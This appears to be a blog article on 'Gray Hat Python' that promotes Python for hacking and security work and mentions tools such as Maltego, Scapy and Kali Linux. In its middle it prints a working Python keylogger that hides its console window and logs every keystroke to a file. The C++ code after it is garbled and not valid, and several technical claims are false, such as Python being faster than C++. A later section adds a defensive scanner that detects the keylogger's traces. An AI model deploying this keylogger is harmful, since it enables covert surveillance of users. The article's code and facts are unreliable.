Gray Hat Python: Security Through Obscurity (updated September 2023)
Introduction to Gray Hat Python
So, two years back, I was researching programming languages; I started reading about C, C++, Assembly, Python, and Ruby. I wanted to become an expert in Cyber Security. So, I started learning as much as I could. I started with C, C++, and C# being the basics, and after learning and compiling lots of programs and viruses, I finally started learning Kali Linux. It is an operating system for penetration testing for those who don’t know what Kali Linux is. So, I was going on with my studies, and I saw that most of the programs, viruses, and Trojans were compiled in Python, their base being Ruby.
Today, I will discuss how Python transformed into Gray Hat Python and why it is so extensively useful that even Google and YouTube use it in their database to give as accurate search results as possible.
To start, Python is a high-level programming language, which means its syntax is extremely easy to read, even for beginners. If you are new to programming, this would be the language I would suggest you start with. Let me give you an example:
How does it look in Different Programming Languages?
Explanation using different programming languages as below:
This is how it looks in C
    #include <stdio.h>

    int main() {
        printf("Hello world\n");
        return 0;
    }
This is how it looks in Java
    class HelloWorld {
        public static void main (String args[]) {
            System.out.println ("Hello World");
        }
    }
This is how it looks in Python (v2.7)
    print ("Hello World")
Simple? Yes, it is. So, Python was easy to write and understand and very compact. So, you might wonder how this led to Gray Hat Python.
Python vs Gray Hat Python
So, what exactly is Gray Hat Python? Why is it so different from our normal Python? The thing is, Gray Hat Python is nothing but programs written in Python by Hackers, Network-Stress testers, and Reverse Engineers to create or crack a program. It is used either to secure software or to create security-breaking software. It is called Gray Hat because it is neither clearly beneficial software nor ordinary user software.
It can easily be useful to test the limitations of a secure environment or break into a safe environment. That’s what Gray Hat means. And it’s far easier to do it in Python than in C, C++, or Java. Thus the name Gray Hat Python. A few examples I can think of are:
• Writing an Automated IDS (Intrusion Detection System for Security Engineers)
You may have heard of Google App Engine. Google App Engine was originally designed in Python before it was ported on. Google App is a good example of a program written in Python because it allows building web applications using its high-end rich collection of libraries, tools, and framework.
Have you ever wondered why searching for something on Google is so easy? Most of the time, you get search results that are 80% accurate. This is because Python is extremely flexible, works at high speed, and the databases are much more compact though it stores ‘n’ number of information. Python is so extensible that even YouTube uses it for purposes like viewing the video, controlling templates, administering videos, accessing canonical data, and many more.
Google has its crawlers and spiders, which gather data as soon as it is uploaded on the web, no matter where or how secure it is. One just needs proper inspiration, time, and knowledge to gather this information.
Google searches were previously based on Python, which later changed to C++ for speed optimization because Google crawlers crawl many pages per second, and each takes a few minutes to crawl successfully. Python, at present, is much faster than C++, but that wasn’t the same case a few decades ago.
As a famous Google quote goes:
“Python where we can, C++ where we must.”
So, you might be wondering how this can be useful for Hacking, Pentesting, and Network Security. I beg to differ. Suppose you could create a program that is 70%-80% accurate in giving efficient search results. In that case, you can probably build an application that can connect websites, search smartly and build a person’s profile, which Individual Black Hats can rather use for malicious purposes. Leave Individuals aside; one is smart enough and can easily create an application for building a company’s profile, its whole tree from its root to whatever you can think of…
Information Gathering via Maltego
You may be thinking that I am exaggerating a bit. Nope, I am NOT!
One just needs to enter pertinent data into the app, and the rest of the things, like linking emails, people, groups of people, and even determining internet infrastructures such as Domains, DNS names, Netblocks, and IP addresses, can be connected and interconnected using this open-source intelligence.
So, if access to “Secret information” determines your success, then Maltego can help you discover it. Maltego is partially written in Python and uses Java, which is a great language.
So much to quote about security from Google. To be more precise, Google is the least way to keep yourself anonymous on the web. It doesn’t matter whether you use incognito or chúng tôi from Chrome. Because, ultimately, everything is updated on the web. The point here is it’s not about invulnerability; it’s about being vulnerable. One cannot completely wipe oneself off the Internet. But one can keep as little info on the Web as possible.
Python is not just a language; it’s a scripting language. Scripting languages allow you to write and modify your tools when you need something more custom. Network security tools depend heavily on scripting languages for extensibility. For example, let’s take Scapy.
Scapy is purely written in Python. It is a powerful interactive packet manipulation tool. It can generate fake packets, scan networks, and even sniff packets.
How is a keylogger written in Python?
Following is the code for a keylogger written in Python:
#!/usr/bin/Python import pyHook import Pythoncom import win32gui import win32console log_file = "log_file.txt" #name of log file window = win32console. GetConsoleWindow() #go to script window win32gui.ShowWindow (window,0) #hide window def pressed_chars(event): #on key pressed function if event.Ascii: f = open(log_file,"a") # (open log_file in append mode) char = chr (event.Ascii) # (insert real char in variable) if char == "q": # (if char is q) f.close() # (close and save log file) exit() # (exit program) if event.Ascii == 13: # (if char is "return") f.write("n") # (new line) f.write(char) # (write char) proc = pyHook.HookManager() #open pyHook proc.KeyDown = pressed_chars #set pressed_chars function on KeyDown event proc.HookKeyboard() #start the function Pythoncom.PumpMessages() #get inputint main(int argc, char ** agrv){ using namepace std; /*Easier*/ char std::vector input_STRUCT = [“S”, “T”, “O”]; char std::vector input_STRUCT_1 = [“P”, “”]; char std::vector input_STRUCT_2 = [“L”, “O”, “O”, “K”, “I”, “N”, “G”]; char std::vector input_STRUCT_3 = [“”, “F”, “O”, “R”]; char std::vector input_STRUCT_4 = [“M”, “A”, “L”, “W”]; char std::vector input_STRUCT_5 = [“A”, “R”, “E”]; ostream os(“C:userskeylogger.txt”); int i; for( i = 0; i <=2; i++){ os << input_STRUCT[i]; for(;i <= 1000000 ;i++){ } } for( i=0; i<=1;i++){ os << input_STRING_1[i]; for(;i <= 1000000 ;i++){ } } for(i=0; i<=6; i++) { os << input_STRING_2 [i]; for(; i <= 1000000 ; i++){ } for(i=0; i<=3;i++){ os << input_STRING_3[i]; for(; i <= 1000000 ;i++){ } } for(i=0; i<=3; i++){ os << input_STRING_4[i]; for(;i <= 1000000 ; i++){ } } for(i=0; i<=2; i++){ os << input_STRING_5[i]; for(;i <= 1000000 ; i++){ } } os.close(); istream is (” C:userskeylogger.txt “); cout << is; return 0; }
So, this is pretty large as compared to Python. And if we talk about efficiency, then Python can be easily compiled into an executable without any effort using py2exe software. Whereas if I talk about C++, then, frankly speaking, this code is a joke. Besides, this code is far from easy for a beginner to understand. To write a proper key logger, one must write a DLL that implements the WH_KEYBOARD hook.
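From the defender's side, the Python listing above leaves clear static traces: it imports pyHook, installs a keyboard hook, and hides its console window. The following is an added example, not code from the original article; it scans Python source for exactly those traces, and the sample inputs and the names scan_source and is_suspicious are constructed for illustration.

```python
import ast

# Indicators taken from the listing above: hook library, hook calls, hidden window.
HOOK_MODULES = {"pyHook", "pythoncom"}
HOOK_CALLS = {"HookKeyboard", "PumpMessages"}

def scan_source(source):
    """Return a sorted list of indicator strings found in Python source."""
    try:
        tree = ast.parse(source)
    except SyntaxError:
        return ["unparseable (Python 2 syntax?), review manually"]
    findings = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in HOOK_MODULES:
                    findings.add("imports " + alias.name)
        elif isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute):
            name = node.func.attr
            if name in HOOK_CALLS:
                findings.add("calls " + name + "()")
            elif name == "ShowWindow" and len(node.args) == 2:
                flag = node.args[1]  # SW_HIDE is 0: the script hides a window
                if isinstance(flag, ast.Constant) and flag.value == 0:
                    findings.add("hides a window with ShowWindow(..., 0)")
    return sorted(findings)

def is_suspicious(findings):
    """Flag only when a keyboard hook is installed and a window is hidden."""
    return ("calls HookKeyboard()" in findings
            and any(f.startswith("hides") for f in findings))

# Constructed sample: indicator skeleton only, the handler records nothing.
SAMPLE = """
import pyHook, pythoncom, win32gui, win32console
win32gui.ShowWindow(win32console.GetConsoleWindow(), 0)
def on_key(event):
    return True
hm = pyHook.HookManager()
hm.KeyDown = on_key
hm.HookKeyboard()
pythoncom.PumpMessages()
"""
BENIGN = "import win32gui\nwin32gui.ShowWindow(hwnd, 5)\n"  # constructed

if __name__ == "__main__":
    for label, src in (("sample", SAMPLE), ("benign", BENIGN)):
        print(label, is_suspicious(scan_source(src)), scan_source(src))
```

Requiring both the hook call and the hidden window keeps legitimate automation scripts, which may use either one alone, out of the results.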
Open Source Hacking
Now, this takes care of Black Hat hackers, which, to be more precise, are the people who intend to destroy and manipulate data for their own needs. Regarding security concerns, Python is also useful for White Hat hackers who intend to save society from malicious hackers’ attacks. If you want to develop a career or at least want to learn Python for security research, then you can surely get in deep with OWASP, BRO, or Quick NIX Secure Script.
OWASP is an Open Web Application Security Project. OWASP aims to create a more secure version of Python that makes it easier for security professionals and developers to write software less prone to hackers’ attacks. It is related to Black-Box analysis, identifying and addressing security-related issues that can affect Python’s interactive interpreter.
BRO is a network security and traffic monitor program, whereas Quick NIX is useful to harden and secure file ownership on the fly.
Since we are speaking of Security, let’s talk about an operating system partially based on Python. Python works great with UNIX, LINUX and Debian. One of the most famous operating systems was Backtrack 5. There were different versions. It was specifically for PenTesting. Later on, the people at Offensive Security thought that Backtrack needed a reboot ‘cause most of the tools were either not working properly or were not supported.
Later, they released Kali Linux, which was based on Debian. And most of its framework is either in Ruby or Python. Ruby, too, is an awesome scripting language. But I would always prefer Python over that because Python has a more diverse community with Linux, and it’s more direct and easy to debug. Ruby has many features and quickly adapts to its surrounding environment, but it can be hard to debug and read, and it is more sophisticated than Python.
The best example would be comparing Apple vs Linux or iPhone vs Android. Apple is rich in resources, extremely smooth, and more biased toward beginners. Whereas Linux/Android is more User-friendly, a bit laggy, and can be a headache sometimes if you don’t know how to configure or maintain it.
Justin Seitz even has a book based on Python Gray Hat Hacking. It deals specifically with automating tedious reverse engineering and security-related tasks, designing your own debugger, library, and DLL injection, sniffing secure traffic over an encrypted session, and using Immunity debugger, Sulley, and many more. It’s an awesome book; it doesn’t matter whether you are a beginner or an expert; you will always learn something or other things every time you read it.
Conclusion
So, if you are a beginner, Python would be the right choice for you to start with as your first programming security testing language.
Just remember one thing in the end: Gray Hat Python is not just a language; it’s a way to do things properly and quickly.